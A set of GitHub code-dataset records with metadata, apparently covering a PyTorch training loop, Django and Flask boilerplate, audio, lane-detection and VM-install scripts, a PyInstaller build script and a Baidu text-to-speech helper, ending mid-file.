pin_memory=True, drop_last = False)\n print('Deep Vision <==> Part3 : loading dataset <==> Done')\n\n\n print('Deep Vision <==> Part4 : model training <==> Begin')\n\n if args.gpu is not None:\n torch.cuda.empty_cache()\n\n for epoch in range(args.start_epoch, args.epochs):\n adjust_learning_rate(args, optimizer, epoch, gamma = 0.1)\n\n # train for one epoch\n train(args, train_loader, model, criterion, optimizer, epoch)\n\n # check if model is still on GPU\n print('Model on GPU?: ', next(model.parameters()).is_cuda)\n\n # evaluate on validation set\n if args.evaluate and epoch % args.eval_epoch == 0:\n prec1 = validate_dv(args, test_loader, model, criterion, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n 'prec1' : prec1,\n }, is_best)\n\n # do a test for visualization\n if vis_img is not None and epoch % args.vis_epoch == 0 and epoch != 0:\n draw_patch_v2(epoch, model, args, args.class_idx)\n\n\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Physicist91/dvfp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "dv.DFL.DFL_VGG16", "line_number": 86, "usage_type": "call"}, {"api_name": "dv.DFL.DFL_ResNet50", "line_number": 89, "usage_type": "call"}, {"api_name": "dv.DFL.Energy_ResNet50", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 98, "usage_type": "name"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 128, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 148, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 149, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 150, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 175, "usage_type": "attribute"}, {"api_name": "torch.cuda.empty_cache", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 184, "usage_type": "attribute"}]} +{"seq_id": "72659473793", "text": "from setuptools import setup, find_packages\nfrom typing import List\n\ndef get_requirements(file_path: str='requirements.txt') -> List[str]:\n with open(file_path) as f:\n requirements = f.read().splitlines()\n if '-e .' in requirements:\n requirements.remove('-e .')\n return requirements\n\nsetup(\n name='KoroKoro',\n version='1.0.0',\n description='See your e-commerce products in 3D',\n author='Dahiru Ibrahim',\n author_email='suhayrid6@gmail.com',\n packages=find_packages(),\n install_requires=get_requirements(),\n)", "repo_name": "Daheer/KoroKoro", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "20020810790", "text": "from django.contrib import admin\n\nfrom .models import Setting, ContactMessage, Events\n\n\nclass SettingAdmin(admin.ModelAdmin):\n list_display = ['title', 'update_at', 'status']\n list_filter = ['title']\n\nclass ContactMessageAdmin(admin.ModelAdmin):\n list_display = ['name', 'update_at', 'status']\n list_filter = ['status']\n readonly_fields = ('name', 'update_at', 'subject', 'your_email', 'your_message', 'ip')\n\nclass EventsAdmin(admin.ModelAdmin):\n list_display = ['title', 'update_at', 'status']\n list_filter = ['status']\n prepopulated_fields = {\"slug\": (\"title\",)}\n\n\nadmin.site.register(Setting, SettingAdmin)\nadmin.site.register(ContactMessage, ContactMessageAdmin)\nadmin.site.register(Events, EventsAdmin)\n\n# Register your models here.\n", "repo_name": "Killman03/mylibsite", "sub_path": "home/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Setting", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "models.ContactMessage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Events", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "6382664117", "text": "\nimport tensorflow as tf\nimport tensorflow_io as tfio\nimport keras\nfrom keras import layers\nfrom keras.layers import Dense, Flatten, Conv2D\nfrom keras.models import Sequential, load_model\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pathlib\nimport os\nfrom IPython import display\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport IPython.display as ipd\nimport pandas as pd\nfrom datetime import date\nfrom datetime import datetime\nimport wave\nimport AudioStream\n\n\ndef log(preds):\n now = datetime.now().strftime(\"%d-%m-%Y\")\n \n log = pd.DataFrame(preds)\n log.to_csv('Logs' + '/' + 'log ' + now + '.csv', index=False)\n\ndef initialize():\n model = keras.models.load_model(\"./Training/processor.h5\")\n return model\n\ndef merge_wav():\n infiles = os.listdir(\"./Process-Segments\")\n print(infiles)\n outfile = \"./Process/process.wav\"\n\n data= []\n for infile in infiles:\n w = wave.open(\"./Process-Segments/\" + infile, 'rb')\n data.append( [w.getparams(), w.readframes(w.getnframes())] )\n w.close()\n \n output = wave.open(outfile, 'wb')\n output.setparams(data[0][0])\n for i in range(len(data)):\n output.writeframes(data[i][1])\n output.close()\n\ndef load_wav(filename):\n file_contents = tf.io.read_file(filename)\n wav, sample_rate = tf.audio.decode_wav(file_contents, desired_channels=1)\n \n wav = tf.squeeze(wav, axis=-1)\n sample_rate = tf.cast(sample_rate, dtype=tf.int64)\n \n wav = tfio.audio.resample(wav, rate_in=sample_rate, rate_out=16000)\n return wav\n\ndef preprocess(file_path, label):\n wav = load_wav(file_path)\n wav = wav[:48000]\n zero_padding = tf.zeros([48000] - tf.shape(wav), dtype=tf.float32)\n wav = tf.concat([zero_padding, wav],0)\n spectrogram = tf.signal.stft(wav, frame_length=320, frame_step=32)\n spectrogram = tf.abs(spectrogram)\n spectrogram = tf.expand_dims(spectrogram, axis=2)\n return spectrogram, label\n\ndef process():\n \n merge_wav()\n \n EVAL = os.path.join('Process')\n eval = tf.data.Dataset.list_files(EVAL +'/*.wav')\n\n data = tf.data.Dataset.zip((eval, tf.data.Dataset.from_tensor_slices(tf.ones(len(eval)))))\n\n data = data.map(preprocess)\n data = data.cache()\n data = data.shuffle(buffer_size=1000)\n data = data.batch(8)\n data = data.prefetch(8)\n\n #preds = model.predict(data)\n\n '''results = ['1' if x > 0.5 else 0 for x in preds]\n \n os.remove(\"./Process/process.wav\")\n log(preds)\n \n for i in range(len(results)):\n results[i] = bool(results[i])\n if(bool(results[i])):\n return True\n return False'''\n return False\n\n\n", "repo_name": "ogsean51/HomeBot", "sub_path": "WakeProcessor.py", "file_name": "WakeProcessor.py", "file_ext": "py", "file_size_in_byte": 2676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 40, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.audio.decode_wav", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.audio", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow_io.audio.resample", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow_io.audio", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.signal.stft", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.signal", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.abs", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.list_files", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.zip", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.ones", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "32869393975", "text": "#!/usr/bin/env python\n\nimport sh\nimport sys\n\ndef install_base_vm(base_domain=\"\", install_media_path=\"\", base_img_path=\"\", base_RAM=512):\n \"\"\"\n Use virt-install to create a base vm to make clones\n\n base_domain == domain name according to virsh\n\n install_media_path == path to .iso, pool, etc\n\n base_img_path == path to .img file to be created\n \"\"\"\n\n if base_domain and install_media_path and base_img_path:\n sh.virt_install('--connect=qemu:///system',\n '-n %s' % (base_domain),\n '-r %s' % (base_RAM),\n '--disk', 'path=%s,size=5,sparse=false' % (base_img_path),\n '-l %s' % (install_media_path),\n '--os-type', 'linux',\n '--hvm',\n '--vnc')\n\n else:\n sys.exit(\"Invalid parameters to install_base_vm()\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 4:\n base_domain = sys.argv[1]\n install_media_path = sys.argv[2]\n base_img_path = sys.argv[3]\n\n install_base_vm(base_domain, install_media_path, base_img_path)\n\n else:\n sys.exit(\"Usage: %s base_domain install_media_path base_img_path\" % (sys.argv[0]))\n", "repo_name": "bmoar/vm", "sub_path": "bin/install_base.py", "file_name": "install_base.py", "file_ext": "py", "file_size_in_byte": 1197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sh.virt_install", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "24404590871", "text": "# Lane Testing\n\nfrom LaneFollower import LaneFollower\nfrom CarControl import CarControl\nfrom matplotlib import pyplot as plt\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\n\nleftColorMin = [90, 245, 180] # Yellow - Determined by plotting imgHSV and hovering over the colors\nleftColorMax = [100, 255, 210] # Yellow\nrightColorMin = [5, 15, 170] # White\nrightColorMax = [20, 40, 230] # White\n\nLF = LaneFollower()\n\nvs = cv2.VideoCapture(\"/dev/video2\", cv2.CAP_V4L) # ls -ltr /dev/video*\n# M = np.load(\"M.npy\")\n\nwhile True:\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n \n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n\n\n LF.update_picture(frame)\n\n img = LF.convert_to_HSV(frame)\n leftMask = LF.filter_by_color(img, leftColorMin, leftColorMax)\n rightMask = LF.filter_by_color(img, rightColorMin, rightColorMax)\n\n leftCanny = LF.canny_img(leftMask)\n rightCanny = LF.canny_img(rightMask)\n\n leftCropped = LF.crop_image(leftCanny)\n rightCropped = LF.crop_image(rightCanny)\n\n leftLines = LF.hough_lines(leftCropped)\n rightLines = LF.hough_lines(rightCropped)\n\n\n try:\n left_line_x, left_line_y, right_line_x, right_line_y = LF.find_lines(leftLines, rightLines)\n\n leftFinal, left_points = LF.calculate_lines(rawImg, left_line_x, left_line_y, 1)\n rightFinal, right_points = LF.calculate_lines(leftFinal, right_line_x, right_line_y, 1)\n except:\n rightFinal = img\n\n image = rightFinal\n\n\n cv2.imshow(\"Camera Feed\", image)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord(\"q\"):\n break\n \nvs.release()\ncv2.destroyAllWindoes()\n\n\n\n", "repo_name": "kalinnorman/SDCars", "sub_path": "class_code/laneTesting.py", "file_name": "laneTesting.py", "file_ext": "py", "file_size_in_byte": 1732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "LaneFollower.LaneFollower", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.CAP_V4L", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindoes", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "34812120111", "text": "from flask_wtf import FlaskForm\nfrom wtforms import validators, StringField\nfrom wtforms.widgets import TextArea\nfrom flask_wtf.file import FileField, FileAllowed\n\nclass FeedPostForm(FlaskForm):\n image = FileField('Profile image', validators=[\n FileAllowed(['jpg', 'jpeg', 'png', 'gif', 'PNG'], 'Only JPEG, PNG and GIFs allowed')\n ])\n post = StringField('Post',\n\n widget=TextArea(),\n\n validators=[\n \n validators.DataRequired(),\n validators.Length(max=1024)\n ])\n\nclass PrivateMessageForm(FlaskForm):\n message = StringField('Message',\n\n widget=TextArea(),\n\n validators=[\n \n validators.DataRequired(), \n validators.Length(max=1024)\n ])", "repo_name": "darwonsamal/Rashid_Darwon_set09103_cw2", "sub_path": "forms/feed.py", "file_name": "feed.py", "file_ext": "py", "file_size_in_byte": 807, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_wtf.FlaskForm", "line_number": 6, "usage_type": "name"}, {"api_name": "flask_wtf.file.FileField", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_wtf.file.FileAllowed", "line_number": 8, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 10, "usage_type": "call"}, {"api_name": "wtforms.widgets.TextArea", "line_number": 12, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 16, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 16, "usage_type": "name"}, {"api_name": "wtforms.validators.Length", "line_number": 17, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 17, "usage_type": "name"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 20, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.widgets.TextArea", "line_number": 23, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 27, "usage_type": "name"}, {"api_name": "wtforms.validators.Length", "line_number": 28, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "22713802011", "text": "\"\"\"Build Corkscrew\n\nThis script runs PyInstaller and by default, the installer build script for the current platform. It should be run \nform the root folder with \"python build/build.py\". It accepts an optional parameter -NI (or --no-installer) to prevent\nthe script from generating an installer.\n\n`UPX `_ can be used by PyInstaller by adding a folder named \"upx\" inside the project\nroot containing a UPX release's files.\n\nFor Windows installer building you'll need Inno Setup 6 installed.\"\"\"\nimport os\nimport platform\nimport shutil\nimport PyInstaller.__main__\nimport sys\nimport installer\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport main\nimport util\n\ncurrent_platform = platform.system()\n\nversion = main.__version\nversion_split = version.split(\".\")\n\n# Make Version Info file for Windows\ntemp_ver_info_file = \"file_version_info.temp\"\ntags = [\n (\"#VERSION#\", version),\n (\"#VERSION_TUPLE#\", f\"{version_split[0]}, {version_split[1]}, {version_split[2]}, 0\")\n ]\nutil.replace_instances(\"build/file_version.txt\", tags, temp_ver_info_file)\n\n# Choose right icon\nif current_platform == \"Darwin\":\n icon_file = \"resources/icon.icns\"\nelif current_platform == \"Windows\":\n icon_file = \"resources/icon.ico\"\n\nargs = [\n \"main.py\",\n \"--icon=%s\" % icon_file,\n \"--name=%s\" % \"Corkscrew\",\n \"--version-file=%s\" % temp_ver_info_file,\n \"--noconsole\",\n \"--onefile\",\n \"--workpath=%s\" % \"pyinstaller_temp\",\n \"--osx-bundle-identifier=%s\" % \"com.androidwg.corkscrew\"\n]\n\n# Leaving this here in case we need it in the future\n# for file in files_to_bundle:\n# file_formatted = file\n# if current_platform != \"Windows\":\n# file_formatted = file.replace(\";\", \":\")\n#\n# arg = \"--add-data=%s\" % file_formatted\n# args.append(arg)\n\n# If UPX folder is found inside root, make sure that PyInstaller uses it\nif os.path.exists(\"../upx/\"):\n args.append(\"--upx-dir=%s\" % \"upx/\")\n\n# Run PyInstaller\nPyInstaller.__main__.run(args)\n\n# Clean temp file after use\nos.remove(temp_ver_info_file)\ntry:\n shutil.rmtree(\"pyinstaller_temp\")\nexcept FileNotFoundError:\n pass\n\n# Make platform installer\nif not sys.argv.__contains__(\"--no-installer\") and not sys.argv.__contains__(\"-NI\"):\n if current_platform == \"Windows\":\n installer.make_windows_installer(version)\n elif current_platform == \"Darwin\":\n installer.make_macos_installer(version)\n\nprint(f\"Finished building version {version}\")\n", "repo_name": "androidWG/Corkscrew", "sub_path": "build/build.py", "file_name": "build.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 22, "usage_type": "call"}, {"api_name": "main.__version", "line_number": 24, "usage_type": "attribute"}, {"api_name": "util.replace_instances", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyInstaller.__main__.__main__.run", "line_number": 66, "usage_type": "call"}, {"api_name": "PyInstaller.__main__.__main__", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyInstaller.__main__", "line_number": 66, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 69, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.argv.__contains__", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "installer.make_windows_installer", "line_number": 78, "usage_type": "call"}, {"api_name": "installer.make_macos_installer", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13438991488", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport sys\nimport time\nimport os\nimport re\nimport random\nfrom aip import AipSpeech\nimport logging\nLOG_FORMAT = \"%(asctime)s - %(levelname)s - %(message)s\" # 日志格式化输出\nDATE_FORMAT = \"%m/%d/%Y %H:%M:%S %p\" # 日期格式\nfp = logging.FileHandler(sys.path[0] + '/keepcat.log', encoding='utf-8')\nfs = logging.StreamHandler()\nlogging.basicConfig(level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT, handlers=[fp, fs]) # 调用\nuserid = ''\ncompleted = False\nwork_dir = sys.path[0]\n# 填写你申请的百度语音的key.\napp_id = ''\napi_key = ''\nsecret_key = ''\n\ndef save(msg,path):\n client = AipSpeech(app_id,api_key,secret_key)\n result = client.synthesis(msg,'zh',1,{'vol':9,'per':1})\n logging.info(path)\n f = open(path,'wb')\n f.write(result)\n f.close()\n \n\ndef get_file_content(filePath):\n fp = open(filePath, 'rb')\n content = fp.read()\n client = AipSpeech(app_id,api_key,secret_key)\n # 2.将音频转成文字\n res = client.asr(content, 'pcm', 16000, {\n # 不填写lan参数生效,都不填写,默认1537(普通话 输入法模型),dev_pid参数见本节开头的表格\n 'dev_pid': 1536,\n })\n logging.info(res)\n return res.get('result')[0]\n\ndef play(msg,filename,playIt=True,update=False):\n path = work_dir + '/' + filename + '.mp3'\n if os.path.exists(path) == False or update:\n save(msg,path)\n if playIt:\n os.system('play ' + path)\n \n\ndef say():\n wakeup = '天猫精灵'\n say = sys.argv[1]\n logging.info('say: ' + say)\n play(wakeup,'tmjl')\n time.sleep(0.8)\n play(say,'says',True,True)\n\nif __name__ == \"__main__\":\n say()\n", "repo_name": "j1111011/keepcat", "sub_path": "says.py", "file_name": "says.py", "file_ext": "py", "file_size_in_byte": 1721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.FileHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "aip.AipSpeech", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "aip.AipSpeech", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 57, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "14629784541", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 05 17:56:50 2016\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import *\r\nfrom numpy import sin, cos, pi, array\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nfrom mpl_toolkits.mplot3d import axes3d, Axes3D\r\nfrom matplotlib import cm\r\nplt.close(\"all\")\r\n#http://matplotlib.org/mpl_examples/mplot3d/subplot3d_demo.py\r\nd2r=pi/180.0\r\n#right=1.0-0.01\r\n#left=1.70\r\nratio_array=[]\r\nrls=[i*0.97/10 for i in range(0,1)]\r\nlls=[1+i*0.73/10 for i in range(0,1)]\r\nXX, YY=np.meshgrid(rls, lls)\r\nZZ=[]\r\nPA=[]\r\nAP=[]\r\nRR=[]\r\nRA=[]\r\nAA=[]\r\nfor ll in [1.65]:#lls:\r\n zz=[]\r\n pa=[]\r\n rr=[]\r\n ap=[]\r\n ra=[]\r\n aa=[]\r\n for rl in [0.97]:#rls:\r\n right=rl #0.8\r\n left=(ll+1*0) #1.73\r\n DT=left-right\r\n X=np.linspace(right, -left, 100)\r\n #X=np.linspace(0.8, -0.8-DT, 100)\r\n x2p1=X*X+1\r\n a=4*x2p1\r\n b=-4*x2p1*X\r\n c=x2p1*x2p1-4\r\n cs1=(-b+np.sqrt(b*b-4*a*c))/(2*a)\r\n #cs2=(-b-np.sqrt(b*b-4*a*c))/(2*a)\r\n th1=np.arccos(cs1)/d2r\r\n ss=np.sin(th1*d2r)\r\n cs=np.cos(th1*d2r)\r\n ss2=1.0-ss\r\n cs2=X-cs\r\n th2=np.arctan2(ss2,cs2)/d2r\r\n X1=cs\r\n Y1=ss\r\n pressureangle1=th2-th1\r\n b4ac1=cs*cs+2*ss-1\r\n ratio1=-ss-(-cs*ss+cs)/np.sqrt(b4ac1)\r\n a11=ratio1\r\n X2=X1+cos(th2*d2r)\r\n Y2=Y1+sin(th2*d2r)\r\n 